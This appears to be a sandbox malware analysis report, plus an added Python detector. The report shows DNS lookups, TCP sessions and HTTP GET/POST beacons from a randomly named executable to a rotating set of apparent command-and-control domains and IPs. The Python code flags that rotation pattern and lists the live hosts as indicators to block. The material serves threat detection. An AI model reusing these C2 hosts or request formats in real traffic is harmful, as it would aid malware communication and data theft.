                                                                                          Dec 19, 2024 07:53:07.366470098 CET4999180192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:07.485966921 CET804999166.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:07.486093044 CET804999166.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:08.604063034 CET804999166.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:08.604119062 CET804999166.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:08.604264021 CET4999180192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:08.869339943 CET4999180192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:09.887965918 CET4999280192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:10.007601976 CET804999266.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:10.007684946 CET4999280192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:10.012969017 CET4999280192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:10.132508039 CET804999266.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:11.238378048 CET804999266.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:11.238600016 CET804999266.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:11.238786936 CET4999280192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:11.241561890 CET4999280192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:11.361007929 CET804999266.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:17.124769926 CET4999380192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:17.244211912 CET8049993195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:17.244313955 CET4999380192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:17.246478081 CET4999380192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:17.368755102 CET8049993195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:18.555402994 CET8049993195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:18.556140900 CET8049993195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:18.556256056 CET4999380192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:18.760838032 CET4999380192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:19.784804106 CET4999480192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:19.904459000 CET8049994195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:19.904625893 CET4999480192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:19.906855106 CET4999480192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:20.026453018 CET8049994195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:21.215508938 CET8049994195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:21.215924025 CET8049994195.110.124.133192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 07:53:21.215981960 CET | 49994 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:21.414618969 CET | 49994 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:22.511920929 CET | 49995 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:22.631469011 CET | 80 | 49995 | 195.110.124.133 | 192.168.2.5
Dec 19, 2024 07:53:22.631592035 CET | 49995 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:22.633655071 CET | 49995 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:22.757937908 CET | 80 | 49995 | 195.110.124.133 | 192.168.2.5
Dec 19, 2024 07:53:22.760829926 CET | 80 | 49995 | 195.110.124.133 | 192.168.2.5
Dec 19, 2024 07:53:24.054831982 CET | 80 | 49995 | 195.110.124.133 | 192.168.2.5
Dec 19, 2024 07:53:24.055115938 CET | 80 | 49995 | 195.110.124.133 | 192.168.2.5
Dec 19, 2024 07:53:24.055203915 CET | 49995 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:24.149038076 CET | 49995 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:25.172213078 CET | 49996 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:25.292090893 CET | 80 | 49996 | 195.110.124.133 | 192.168.2.5
Dec 19, 2024 07:53:25.292300940 CET | 49996 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:25.294100046 CET | 49996 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:25.413781881 CET | 80 | 49996 | 195.110.124.133 | 192.168.2.5
Dec 19, 2024 07:53:26.602058887 CET | 80 | 49996 | 195.110.124.133 | 192.168.2.5
Dec 19, 2024 07:53:26.602190971 CET | 80 | 49996 | 195.110.124.133 | 192.168.2.5
Dec 19, 2024 07:53:26.602852106 CET | 49996 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:26.606738091 CET | 49996 | 80 | 192.168.2.5 | 195.110.124.133
Dec 19, 2024 07:53:26.726401091 CET | 80 | 49996 | 195.110.124.133 | 192.168.2.5
Dec 19, 2024 07:53:48.614936113 CET | 49997 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:48.734600067 CET | 80 | 49997 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:48.734714031 CET | 49997 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:48.739106894 CET | 49997 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:48.858642101 CET | 80 | 49997 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:49.937742949 CET | 80 | 49997 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:49.937835932 CET | 80 | 49997 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:49.938091040 CET | 49997 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:50.242738962 CET | 49997 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:51.262820959 CET | 49998 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:51.382708073 CET | 80 | 49998 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:51.382879972 CET | 49998 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:51.385862112 CET | 49998 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:51.505497932 CET | 80 | 49998 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:52.582767010 CET | 80 | 49998 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:52.583105087 CET | 80 | 49998 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:52.583164930 CET | 49998 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:52.898984909 CET | 49998 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:53.917431116 CET | 49999 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:54.036931992 CET | 80 | 49999 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:54.037066936 CET | 49999 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:54.038973093 CET | 49999 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:54.158508062 CET | 80 | 49999 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:54.158576012 CET | 80 | 49999 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:55.243753910 CET | 80 | 49999 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:55.243966103 CET | 80 | 49999 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:55.244043112 CET | 49999 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:55.555305004 CET | 49999 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:56.574816942 CET | 50000 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:56.694611073 CET | 80 | 50000 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:56.694724083 CET | 50000 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:56.698815107 CET | 50000 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:56.818429947 CET | 80 | 50000 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:57.895500898 CET | 80 | 50000 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:57.895536900 CET | 80 | 50000 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:57.895694017 CET | 50000 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:57.895857096 CET | 80 | 50000 | 217.196.55.202 | 192.168.2.5
Dec 19, 2024 07:53:57.895905972 CET | 50000 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:57.898777962 CET | 50000 | 80 | 192.168.2.5 | 217.196.55.202
Dec 19, 2024 07:53:58.018650055 CET | 80 | 50000 | 217.196.55.202 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 07:50:32.001988888 CET | 53643 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:50:33.008780003 CET | 53643 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:50:34.008922100 CET | 53643 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:50:34.211107969 CET | 53 | 53643 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:50:34.211148024 CET | 53 | 53643 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:50:34.211175919 CET | 53 | 53643 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:50:50.933649063 CET | 52337 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:50:51.167866945 CET | 53 | 52337 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:50:59.230099916 CET | 64148 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:50:59.895174026 CET | 53 | 64148 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:51:14.574572086 CET | 64825 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:51:14.907155991 CET | 53 | 64825 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:51:22.966211081 CET | 63040 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:51:23.531375885 CET | 53 | 63040 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:52:37.980994940 CET | 65097 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:52:38.264291048 CET | 53 | 65097 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:52:52.902602911 CET | 63167 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:52:53.122478962 CET | 53 | 63167 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:53:01.184552908 CET | 56203 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:53:01.706144094 CET | 53 | 56203 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:53:16.246166945 CET | 64791 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:53:17.121870041 CET | 53 | 64791 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:53:31.622642994 CET | 65244 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:53:31.857748985 CET | 53 | 65244 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:53:39.918833971 CET | 63570 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:53:40.140256882 CET | 53 | 63570 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:53:48.199472904 CET | 58118 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:53:48.611931086 CET | 53 | 58118 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:54:02.918811083 CET | 64428 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:54:03.141207933 CET | 53 | 64428 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:54:11.605834961 CET | 53673 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:54:11.832828045 CET | 53 | 53673 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:54:19.887371063 CET | 59674 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:54:20.143332005 CET | 53 | 59674 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 07:54:28.202824116 CET | 52835 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 07:54:28.430550098 CET | 53 | 52835 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 07:50:32.001988888 CET | 192.168.2.5 | 1.1.1.1 | 0x785 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:50:33.008780003 CET | 192.168.2.5 | 1.1.1.1 | 0x785 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:50:34.008922100 CET | 192.168.2.5 | 1.1.1.1 | 0x785 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:50:50.933649063 CET | 192.168.2.5 | 1.1.1.1 | 0xab68 | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:50:59.230099916 CET | 192.168.2.5 | 1.1.1.1 | 0x720e | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:51:14.574572086 CET | 192.168.2.5 | 1.1.1.1 | 0x7f68 | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:51:22.966211081 CET | 192.168.2.5 | 1.1.1.1 | 0x42a3 | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:52:37.980994940 CET | 192.168.2.5 | 1.1.1.1 | 0x651 | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:52:52.902602911 CET | 192.168.2.5 | 1.1.1.1 | 0xa70d | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:53:01.184552908 CET | 192.168.2.5 | 1.1.1.1 | 0x1dd2 | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:53:16.246166945 CET | 192.168.2.5 | 1.1.1.1 | 0xf023 | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:53:31.622642994 CET | 192.168.2.5 | 1.1.1.1 | 0xa67 | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:53:39.918833971 CET | 192.168.2.5 | 1.1.1.1 | 0x6dc3 | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:53:48.199472904 CET | 192.168.2.5 | 1.1.1.1 | 0x76d2 | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:54:02.918811083 CET | 192.168.2.5 | 1.1.1.1 | 0xaf2 | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:54:11.605834961 CET | 192.168.2.5 | 1.1.1.1 | 0xd74b | Standard query (0) | www.k9vyp11no3.cfd | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:54:19.887371063 CET | 192.168.2.5 | 1.1.1.1 | 0xfb13 | Standard query (0) | www.shenzhoucui.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:54:28.202824116 CET | 192.168.2.5 | 1.1.1.1 | 0x23ed | Standard query (0) | www.b301.space | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 07:50:34.211107969 CET | 1.1.1.1 | 192.168.2.5 | 0x785 | No error (0) | www.3xfootball.com | - | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:50:34.211148024 CET | 1.1.1.1 | 192.168.2.5 | 0x785 | No error (0) | www.3xfootball.com | - | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:50:34.211175919 CET | 1.1.1.1 | 192.168.2.5 | 0x785 | No error (0) | www.3xfootball.com | - | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:50:51.167866945 CET | 1.1.1.1 | 192.168.2.5 | 0xab68 | Name error (3) | www.kasegitai.tokyo | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:50:59.895174026 CET | 1.1.1.1 | 192.168.2.5 | 0x720e | No error (0) | www.goldenjade-travel.com | - | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:51:14.907155991 CET | 1.1.1.1 | 192.168.2.5 | 0x7f68 | Name error (3) | www.antonio-vivaldi.mobi | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:51:23.531375885 CET | 1.1.1.1 | 192.168.2.5 | 0x42a3 | No error (0) | www.magmadokum.com | redirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 07:51:23.531375885 CET | 1.1.1.1 | 192.168.2.5 | 0x42a3 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 07:51:23.531375885 CET | 1.1.1.1 | 192.168.2.5 | 0x42a3 | No error (0) | natroredirect.natrocdn.com | - | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:52:38.264291048 CET | 1.1.1.1 | 192.168.2.5 | 0x651 | No error (0) | www.rssnewscast.com | - | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:52:53.122478962 CET | 1.1.1.1 | 192.168.2.5 | 0xa70d | Name error (3) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:53:01.706144094 CET | 1.1.1.1 | 192.168.2.5 | 0x1dd2 | No error (0) | www.techchains.info | - | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:53:17.121870041 CET | 1.1.1.1 | 192.168.2.5 | 0xf023 | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 07:53:17.121870041 CET | 1.1.1.1 | 192.168.2.5 | 0xf023 | No error (0) | elettrosistemista.zip | - | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:53:31.857748985 CET | 1.1.1.1 | 192.168.2.5 | 0xa67 | Name error (3) | www.donnavariedades.com | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:53:40.140256882 CET | 1.1.1.1 | 192.168.2.5 | 0x6dc3 | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:53:48.611931086 CET | 1.1.1.1 | 192.168.2.5 | 0x76d2 | No error (0) | www.empowermedeco.com | empowermedeco.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 07:53:48.611931086 CET | 1.1.1.1 | 192.168.2.5 | 0x76d2 | No error (0) | empowermedeco.com | - | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:54:03.141207933 CET | 1.1.1.1 | 192.168.2.5 | 0xaf2 | Name error (3) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:54:11.832828045 CET | 1.1.1.1 | 192.168.2.5 | 0xd74b | Name error (3) | www.k9vyp11no3.cfd | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:54:20.143332005 CET | 1.1.1.1 | 192.168.2.5 | 0xfb13 | Name error (3) | www.shenzhoucui.com | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 07:54:28.430550098 CET | 1.1.1.1 | 192.168.2.5 | 0x23ed | Name error (3) | www.b301.space | none | none | A (IP address) | IN (0x0001) | false
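The DNS tables above show one new, unrelated name queried roughly every 8 to 15 seconds, nine of the sixteen answered NXDOMAIN, spread over nine different TLDs: the shape of a bot walking an embedded list of candidate C2 hosts rather than a user browsing. The following added example (not part of the Joe Sandbox report) turns that shape into a detection. Its input is a per-name log constructed from the query and answer tables (query time, transaction ID, name, reply code, final A record); it collapses the three retries of the first query, then reports distinct-name count, NXDOMAIN share, TLD spread and median query cadence. The thresholds in is_c2_rotation and the benign control log are assumptions, not values taken from the report.

```python
from datetime import datetime
from statistics import median

# Constructed from the report's DNS query and answer tables.
# Fields: query timestamp, transaction ID, queried name, reply code
# (0 = No error, 3 = Name error / NXDOMAIN), final A record (None if NXDOMAIN).
# The first name was retried three times before 1.1.1.1 answered, as in the report.
DNS_LOG = [
    ("2024-12-19 07:50:32.001988", 0x785,  "www.3xfootball.com",        0, "154.215.72.110"),
    ("2024-12-19 07:50:33.008780", 0x785,  "www.3xfootball.com",        0, "154.215.72.110"),
    ("2024-12-19 07:50:34.008922", 0x785,  "www.3xfootball.com",        0, "154.215.72.110"),
    ("2024-12-19 07:50:50.933649", 0xab68, "www.kasegitai.tokyo",       3, None),
    ("2024-12-19 07:50:59.230099", 0x720e, "www.goldenjade-travel.com", 0, "116.50.37.244"),
    ("2024-12-19 07:51:14.574572", 0x7f68, "www.antonio-vivaldi.mobi",  3, None),
    ("2024-12-19 07:51:22.966211", 0x42a3, "www.magmadokum.com",        0, "85.159.66.93"),
    ("2024-12-19 07:52:37.980994", 0x651,  "www.rssnewscast.com",       0, "91.195.240.94"),
    ("2024-12-19 07:52:52.902602", 0xa70d, "www.liangyuen528.com",      3, None),
    ("2024-12-19 07:53:01.184552", 0x1dd2, "www.techchains.info",       0, "66.29.149.46"),
    ("2024-12-19 07:53:16.246166", 0xf023, "www.elettrosistemista.zip", 0, "195.110.124.133"),
    ("2024-12-19 07:53:31.622642", 0xa67,  "www.donnavariedades.com",   3, None),
    ("2024-12-19 07:53:39.918833", 0x6dc3, "www.660danm.top",           3, None),
    ("2024-12-19 07:53:48.199472", 0x76d2, "www.empowermedeco.com",     0, "217.196.55.202"),
    ("2024-12-19 07:54:02.918811", 0xaf2,  "www.joyesi.xyz",            3, None),
    ("2024-12-19 07:54:11.605834", 0xd74b, "www.k9vyp11no3.cfd",        3, None),
    ("2024-12-19 07:54:19.887371", 0xfb13, "www.shenzhoucui.com",       3, None),
    ("2024-12-19 07:54:28.202824", 0x23ed, "www.b301.space",            3, None),
]

# Constructed benign control: a few related names resolved once (assumed data).
BENIGN_LOG = [
    ("2024-12-19 08:00:00.000000", 0x1, "www.example.com",  0, "203.0.113.10"),
    ("2024-12-19 08:00:00.250000", 0x2, "cdn.example.net",  0, "203.0.113.11"),
    ("2024-12-19 08:00:41.000000", 0x3, "mail.example.org", 0, "203.0.113.12"),
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def summarize_dns(log):
    """Collapse retries per name and describe the burst: how many distinct names,
    what share failed, how many TLDs, and how regular the cadence was."""
    first = {}
    for ts, _tid, name, rcode, addr in log:
        first.setdefault(name, (_ts(ts), rcode, addr))  # keep first attempt only
    names = list(first)
    times = sorted(first[n][0] for n in names)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    nx = sum(1 for n in names if first[n][1] == 3)
    tlds = {n.rsplit(".", 1)[-1] for n in names}
    return {
        "distinct_names": len(names),
        "nxdomain_ratio": nx / len(names) if names else 0.0,
        "tld_count": len(tlds),
        "median_gap_s": median(gaps) if gaps else 0.0,
        # resolved names with their final address: the IOC list to block/hunt on
        "resolved": {n: first[n][2] for n in names if first[n][2]},
    }


def is_c2_rotation(summary, min_names=8, min_nx_ratio=0.3, min_tlds=4, max_median_gap_s=30.0):
    """Assumed thresholds: many unrelated names, a high NXDOMAIN share across
    many TLDs, and a steady sub-30-second cadence between new names."""
    return (summary["distinct_names"] >= min_names
            and summary["nxdomain_ratio"] >= min_nx_ratio
            and summary["tld_count"] >= min_tlds
            and summary["median_gap_s"] <= max_median_gap_s)


if __name__ == "__main__":
    s = summarize_dns(DNS_LOG)
    print("flagged:", is_c2_rotation(s))
    for name, addr in s["resolved"].items():
        print(f"  {name} -> {addr}")
```

In a real pipeline the summary would be computed per client and per sliding window (for example five minutes) over a DNS log or Zeek dns.log rather than over the whole capture; the resolved map doubles as the list of live infrastructure to block, since the NXDOMAIN names are dead at the time of analysis but may be registered later.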
                                                                                          • www.3xfootball.com
                                                                                          • www.goldenjade-travel.com
                                                                                          • www.magmadokum.com
                                                                                          • www.rssnewscast.com
                                                                                          • www.techchains.info
                                                                                          • www.elettrosistemista.zip
                                                                                          • www.empowermedeco.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49740 | 154.215.72.110 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:50:34.341274977 CET | 523 | OUT | GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Host: www.3xfootball.com
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 19, 2024 07:50:35.888730049 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Thu, 19 Dec 2024 06:50:35 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49800 | 116.50.37.244 | 80 | 5956 | C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 07:51:00.020395994 CET | 804 | OUT | POST /fo8o/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                          Accept-Language: en-US,en
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.goldenjade-travel.com
                                                                                          Origin: http://www.goldenjade-travel.com
                                                                                          Cache-Control: no-cache
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Content-Length: 209
                                                                                          Referer: http://www.goldenjade-travel.com/fo8o/
